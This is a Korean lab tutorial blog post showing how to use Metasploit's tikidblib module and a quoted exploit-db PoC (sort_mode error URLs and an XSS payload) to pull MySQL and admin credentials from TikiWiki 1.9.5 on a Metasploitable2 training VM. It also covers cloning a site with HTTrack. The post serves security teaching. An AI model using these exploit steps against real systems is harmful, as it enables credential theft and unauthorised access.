정보보안(구버전)/Metasploit 2016. 6. 2. 17:08

Metasploit - 06. 취약점 발견 및 공격 (tikiwiki 취약점 공격)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Metasploitable2-Linux

 

 

 - 메타스플로잇을 이용하여 취약점을 발견한 다음, tikiwiki 취약점을 공격하도록 한다.

 - tikiwiki : MySQL DB 사용하는 위키 서비스(다른 위키보다 많이 사용하고 있는 편)

 - 참고 사이트 : http://tiki.org, http://tehemes.tiki.org

 

 

[참고] 위키(Wiki)

 

인터넷이나 회사 내부용 게시판 형식의 웹-서비스이며, 게시물/문서를 공동으로 취급하여 작업이 가능한 서비스이다.

 

 

[실습 단계]

 

tikiwiki195' DB 생성 -> 스캔 -> tikiwiki 취약점 공격 -> MySQL ID/PASSWORD 획득 -> tikiwiki MySQL 접속 ->

 

-> tikiwiki195 DB 접근 및 ID/PASSWORD 확인 -> 웹-접속 및 관리자 로그인 실시

 

 

 

Ex1) Metasploitable2-Linux MySQL 'tikiwiki195 DB' 생성

 

@ Kali Linux

 

 - 취약점 테스트를 하기 위하여 Metasploitable2-Linux MySQL DB에 'tikiwiki195' DB를 생성한다.

 

root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php

 

 

'go here to begin the installation process' 클릭

 

 

 

root 계정으로 'tikiwiki195' DB 생성 -> Submit Query 클릭

 

~ 중간 생략 ~

 

 

 

 

create 클릭 -> Firefox 종료

 

 

 

 

 - Metasploitable2-Linux에서 'tikiwiki195' DB 생성 확인 실시

 

@ Metasploitable2-Linux

 

msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (엔터)
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 14
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

 

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

 

mysql> show databases;
+--------------------+
| Database            |
+--------------------+
| information_schema |
| dvwa                   |
| metasploit            |
| mysql                 |
| owasp10             |
| tikiwiki                |
| tikiwiki195            |
+--------------------+
7 rows in set (0.00 sec)

 

mysql> quit
Bye
msfadmin@metasploitable:~$

 

 

 

 

Ex2) 'powerfuzzer'을 이용하여 tikiwiki URL 확인 (실습시 않해도 무관함)

 

 - powerfuzzer : 웹 또는 어플리케이션에 대한 숨겨진 파일, 디렉토리, URL들을 검색하는 스캔 툴

 

@ Kali Linux

 

root@kali:~# powerfuzzer &
[1] 27746

 

 

'192.168.20.204' URL 스캔 실시 및 확인

 

 

 

'http://192.168.20.204/twiki/bin/view/Main/WebHome' 접속 확인

 

 

 

 

 

Ex3) 'tikiwiki' 취약점 검색 및 공격

 

- '192.168.20.204'를 타겟으로 db_nmap 스켄을 실시한다.

 

@ Kali Linux

 

  -sV: Probe open ports to determine service/version info

 

root@kali:~# msfconsole

 

msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
~ 중간 생략 ~


 

msf > search tikiwiki

Matching Modules
================

   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   auxiliary/admin/tikiwiki/tikidblib               2006-11-01       normal     TikiWiki Information Disclosure
   exploit/unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
   exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
   exploit/unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  TikiWiki jhot Remote Command Execution
   exploit/unix/webapp/tikiwiki_unserialize_exec    2012-07-04       excellent  Tiki Wiki unserialize() PHP Code Execution

 

 

msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > show options

Module options (auxiliary/admin/tikiwiki/tikidblib):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /tikiwiki        yes       TikiWiki directory path
   VHOST                     no        HTTP server virtual host


Auxiliary action:

   Name      Description
   ----      -----------
   Download 

 


msf auxiliary(tikidblib) > set RHOST 192.168.20.204
RHOST => 192.168.20.204

 


msf auxiliary(tikidblib) > run

[*] Establishing a connection to the target...
[*] Get informations about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type      : mysql
[*] DB name      : tikiwiki195
[*] DB host      : localhost
[*] DB user      : root
[*] DB password  :
[*] Auxiliary module execution completed
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > quit
root@kali:~#

 

 

 

 - Metasploitable2-Linux으로 접속하여 MySQL 정보 확인 실시

 

@ Kali Linux

 

root@kali:~# telnet 192.168.20.204

~ 중간 생략~

 

Warning: Never expose this VM to an untrusted network!

 

Contact: msfdev[at]metasploit.com

 

Login with msfadmin/msfadmin to get started


metasploitable login: msfadmin
Password: msfadmin

 

 

msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (엔터)
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 193
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

 

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

 

mysql>
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa                |
| metasploit         |
| mysql               |
| owasp10            |
| tikiwiki              |
| tikiwiki195         |
+--------------------+
7 rows in set (0.00 sec)

 

 

mysql> use tikiwiki195
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed


mysql> show tables;
~ 중간 생략 ~

 

| users_objectpermissions            |
| users_permissions                   |
| users_usergroups                    |
| users_users                            |
+------------------------------------+
194 rows in set (0.00 sec)

 


mysql> select * from users_users;
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin  | currentLogin | registrationDate | challenge | pass_due | hash                             | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
|      1 |       | admin | admin    | NULL     | NULL          | 1271712540 |   1271712540 |             NULL | NULL      |     NULL | f6fdffe48c908deb0f4c3bd36c032e72 |    NULL | NULL       |       NULL | NULL           | NULL       | NULL          | NULL       |     0 |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.01 sec)

 

mysql> select login,password from users_users;
+-------+----------+
| login | password |
+-------+----------+
| admin | admin    |
+-------+----------+
1 row in set (0.00 sec)

 

mysql> quit
Bye
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ exit
Connection closed by foreign host.

 

 

 

 - 웹으로 접속하여 'admin/admin'으로 접속 테스트 실시

 

@ Kali Linux

 

root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php

 

 

'admin/admin'으로 로그인 실시


 

 

 

[참고] exploit-db 사이트 참조

 

 - exploit-db 사이트 -> search -> tikiwiki 검색

 - https://www.exploit-db.com/exploits/2701/

 

 

2006-11-01 TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability

/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius-  (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
 
 
 
there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=
 
a proof of concept is disponible here : http://cockor.free.fr/PoC.swf
 
there's also a xss here :
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--
 
regards , securfrog
 
# milw0rm.com [2006-11-01] 

 

 

@ Kali Linux

 

 - 파이어폭스를 실행하여 다음과 같이 접속을 실시한다.

 

root@kali:~# firefox &

 

http://192.168.20.204/tikiwiki/tiki-listpages.php?offset=0&sort_mode=

 

 

접속되면, 밑으로 내려서 'root' 패스워드 확인

 

 

 

 

[참고] HTTrack

 

 - Powerpuzzer과 비슷한 툴이지만, HTTrack은 웹-사이트에 대해서 클론 구성을 실시한다.

 

Ex1) HTTrack 설치

 

root@kali:~# apt-get install httrack

 

 

 

Ex2) 웹 사이트 클론 디렉토리 생성 및 확인

 

(터미널1)

root@kali:~# mkdir /test-web-site
root@kali:~# cd /test-web-site/
root@kali:/test-web-site#

 

 

 

Ex3) HTTrack을 이용하여 웹-사이트 클론 실시

 

(터미널1)

root@kali:/test-web-site# httrack

 

Welcome to HTTrack Website Copier (Offline Browser) 3.48-20
Copyright (C) 1998-2014 Xavier Roche and other contributors
To see the option list, enter a blank line or try httrack --help

 

Enter project name :HTTrack Test

 

Base path (return=/root/websites/) :/test-web-site

 

Enter URLs (separated by commas or blank spaces) :192.168.20.204

 

Action:
(enter)  1 Mirror Web Site(s)
          2 Mirror Web Site(s) with Wizard
          3 Just Get Files Indicated
          4 Mirror ALL links in URLs (Multiple Mirror)
          5 Test Links In URLs (Bookmark Test)
          0 Quit
: 2

 

Proxy (return=none) : (엔터)

 

You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip
Wildcards (return=none) : (엔터)

 

You can define additional options, such as recurse level (-r<number>), separed by blank spaces
To see the option list, type help
Additional options (return=none) : (엔터)

 

---> Wizard command line: httrack 192.168.20.204 -W -O "/test-web-site/HTTrack Test"  -%v 

 

Ready to launch the mirror? (Y/n) :y

 

WARNING! You are running this program as root!
It might be a good idea to run as a different user
Mirror launched on Fri, 03 Jun 2016 14:02:41 by HTTrack Website Copier/3.48-20 [XR&CO'2014]
mirroring 192.168.20.204 with the wizard help..

 

 

 

 

Ex4) 웹-사이트 클론 내용 확인

 

(터미널2)

root@kali:~# cd /test-web-site/
root@kali:/test-web-site# ls
HTTrack Test

 


root@kali:/test-web-site# cd HTTrack\ Test/
root@kali:/test-web-site/HTTrack Test# ls
192.168.20.204  fade.gif   hts-in_progress.lock  index.html
backblue.gif    hts-cache  hts-log.txt

 


root@kali:/test-web-site/HTTrack Test# cd 192.168.20.204
root@kali:/test-web-site/HTTrack Test/192.168.20.204# ls
dav  dvwa  index.html  mutillidae  phpMyAdmin  twiki

 


root@kali:/test-web-site/HTTrack Test/192.168.20.204# cd twiki/
root@kali:/test-web-site/HTTrack Test/192.168.20.204/twiki# ls
TWikiDocumentation.html.tmp  bin         license.txt  readme.txt.tmp
TWikiHistory.html.tmp        index.html  readme.txt

 


root@kali:/test-web-site/HTTrack Test/192.168.20.204/twiki# find .
.
./TWikiHistory.html.tmp
./readme.txt
./readme.txt.tmp
./license.txt
./bin
./bin/view
./bin/view/Main
./bin/view/Main/WebHome.html.tmp
./TWikiDocumentation.html.tmp
./index.html


root@kali:/test-web-site/HTTrack Test/192.168.20.204/twiki#

 

 

 

Ex5) HTTrack 종료

 

(터미널1)

Mirror launched on Fri, 03 Jun 2016 14:02:41 by HTTrack Website Copier/3.48-20 [XR&CO'2014]
mirroring 192.168.20.204 with the wizard help..

(ctrl+c)


Program terminated (signal 2)
root@kali:/test-web-site# cd

root@kali:~#

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

저작자표시 비영리 변경금지

'정보보안(구버전) > Metasploit' 카테고리의 다른 글

Metasploit - 08. 취약점 발견 및 공격 (Tomcat 취약점)  (0) 2016.06.03
Metasploit - 07. 취약점 발견 및 공격 (CVE-2008-0166)  (0) 2016.06.03
Metasploit - 05. 취약점 발견 및 공격 (MySQL 원격 로그인 시도)  (0) 2016.06.02
Metasploit - 04. 공격 타겟 스캐닝  (0) 2016.06.02
Metasploit - 03. 외부 스캔 파일 사용하는 방법  (0) 2016.06.02
Posted by 김정우 강사(카카오톡 : kim10322)
,

티스토리툴바

Q